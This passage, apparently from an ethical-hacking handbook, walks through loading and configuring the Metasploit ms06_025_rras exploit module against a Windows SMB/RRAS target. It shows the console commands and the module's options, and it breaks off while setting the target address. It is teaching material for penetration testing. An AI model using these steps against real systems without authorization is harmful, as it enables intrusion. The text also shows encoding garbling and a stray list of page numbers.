We??™ll use that exploit
and then go looking for all the options needed to make the exploit work.
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Notice that the prompt changes to enter ???exploit mode??? when you use an exploit
module. Any options or variables you set while configuring this exploit will be retained
so you don??™t have to reset the options every time you run it. You can get back to the original
launch state at the main console by issuing the back command.
msf exploit(ms06_025_rras) > back
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Different exploits have different options. Let??™s see what options need to be set to
make the RRAS exploit work.
msf exploit(ms06_025_rras) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Gray Hat Hacking: The Ethical Hacker??™s Handbook
78
This exploit requires a target address, the port number SMB (server message block)
uses to listen, and the name of the pipe exposing this functionality.
msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.
Pages:
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210